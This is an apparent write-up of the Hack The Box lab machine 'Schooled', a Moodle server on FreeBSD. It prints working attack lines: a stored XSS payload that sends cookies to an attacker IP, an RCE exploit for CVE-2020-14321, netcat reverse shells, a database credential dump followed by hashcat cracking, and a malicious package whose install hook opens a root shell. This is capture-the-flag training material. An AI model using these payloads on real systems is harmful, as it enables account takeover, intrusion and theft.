namp Scan:

PORT   STATE SERVICE REASON         VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.9 (FreeBSD 20200214;
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.46 ((FreeBSD)
Service Info: OS: FreeBSD;

port 80 serves a web service, which says All content will be delivered over Moodle.

enumerating its subdomain

gobuster dns -d erev0s.com -w su 0 -i

Lets get it :)
So Lets enumerate more…

Once we enroll the courses we can see some instructions.

MoodleNet profiles to be set hmm…
lets check some exploits for moodle

Ah we got some xss, lets check that out

Stored XSS Works as intended.

So as the maths teacher said he will be checking the profile id, so using stored xss we can steal cookies and login as that teacher.
XSS Payload

<img src='x' onerror='fetch("http://[IP]/?data=" + btoa(document.cookie));'>sudo python3 -m http.server <port>

So replacing my cookie with teachers cookie, we can take over the teachers

Hmm.. there is a RCE vulnerability

CVE-2020–14321

Using this Vulnerability, we were able to do RCE, to get a shell we will be using webwrap.

python3 webwrap.py http://moodle.schooled.htb/moodle/blocks/rce/lang/en/block_rce.php?cmd=WRAP

and netcat to get a proper stable shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port>>/tmp/f

Enumerating we can see that there are two users

We don’t have access though, enumerating, we can see moodle uses mysql, so find config.php of model revels the mysql username and password
config.php

/usr/local/www/apache24/data/moodle

Locating mysql, /usr/local/bin

./mysql -u moodle -pPlaybookMaster2020 -D moodle -e 'SELECT username, password FROM mdl_user ORDER BY username;'

Gives admin username and password, cracking the password with hashcat

hashcat -m 3200 -a 0 hash /usr/share/wordlists/rockyou.txt

Login as admin we can see that

So he is one of the user which we found, SSH this user

Enumerating, we can see that we have sudo permission for package install,

#!/bin/bash
STAGEDIR=/tmp/package
rm -rf ${STAGEDIR}
mkdir -p ${STAGEDIR}
cat >> ${STAGEDIR}/+PRE_INSTALL <<EOF
# careful here, this may clobber your system
echo “Resetting root shell”
rm /tmp/a;mkfifo /tmp/a;cat /tmp/a|/bin/sh -i 2>&1|nc 10.10.14.7 9080 >/tmp/a
EOF
cat >> ${STAGEDIR}/+POST_INSTALL <<EOF
# careful here, this may clobber your system
echo “Registering root shell”
pw usermod -n root -s /bin/sh
EOF
cat >> ${STAGEDIR}/+MANIFEST <<EOF
name: mypackage
version: “1.0_5”
origin: sysutils/mypackage
comment: “automates stuff”
desc: “automates tasks which can also be undone later”
maintainer: john@doe.it
www: https://doe.it
prefix: /
EOF
pkg create -m ${STAGEDIR}/ -r ${STAGEDIR}/ -o .

mkdir /temp/package

Installing this package gives us the super user shell

Dev Dominus | Cyber security Enthusiast | Programming For Fun